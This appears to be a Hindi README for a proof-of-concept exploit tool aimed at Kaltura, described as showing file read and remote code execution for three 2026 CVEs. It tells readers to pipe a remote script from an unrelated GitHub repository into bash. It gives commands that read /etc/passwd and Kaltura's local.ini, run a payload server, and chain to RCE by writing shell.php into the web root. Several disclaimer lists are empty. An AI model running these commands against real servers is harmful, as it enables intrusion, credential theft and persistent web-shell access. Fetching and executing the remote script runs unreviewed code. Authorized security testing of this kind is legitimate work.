
CVE-2026-19912, CVE-2026-19913, और CVE-2026-19914 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Kaltura में फ़ाइल रीड और रिमोट कोड निष्पादन का प्रदर्शन करते हैं, जो अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए हैं।
बाहरी डाउनलोड स्क्रिप्ट का नवीनतम संस्करण सीधे GitHub से चलाएँ:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
इस कमांड के लिए Bash और
curlकी आवश्यकता होती है। यदि आप स्रोत पर भरोसा नहीं करते हैं, तो इसे चलाने से पहले रिमोट स्क्रिप्ट की समीक्षा करें।
इस प्रोजेक्ट का उपयोग केवल सुरक्षित और अधिकृत वातावरणों में करें, जैसे:
उदाहरण सेटअप:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
उदाहरण उपयोग:
# 1. File read (most reliable, works as described in the article)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Only the payload server (use with Burp / curl manually)
python3 kaltura_poc.py serve --lport 8888
# 3. Full chain skeleton
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
नियंत्रित वातावरणों में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और शोध करने के लिए एक भंडार।
यह भंडार केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।
यह उपयोगकर्ताओं को निम्नलिखित के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:
इस भंडार का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति हो, जैसे:
अनधिकृत या अवैध उपयोग सख्त वर्जित है।
लेखक और योगदानकर्ता इस प्रोजेक्ट के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी समस्या या हानि के लिए जिम्मेदार नहीं हैं।
इस भंडार का उपयोग करके, आप सहमत हैं कि:
यह प्रोजेक्ट निम्नलिखित के लिए है:
कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।
जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से भंडार अनुरक्षक से संपर्क करें।
अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए अतिरिक्त CVE प्रूफ-ऑफ-कॉन्सेप्ट संसाधनों हेतु PoC CVE Collection देखें।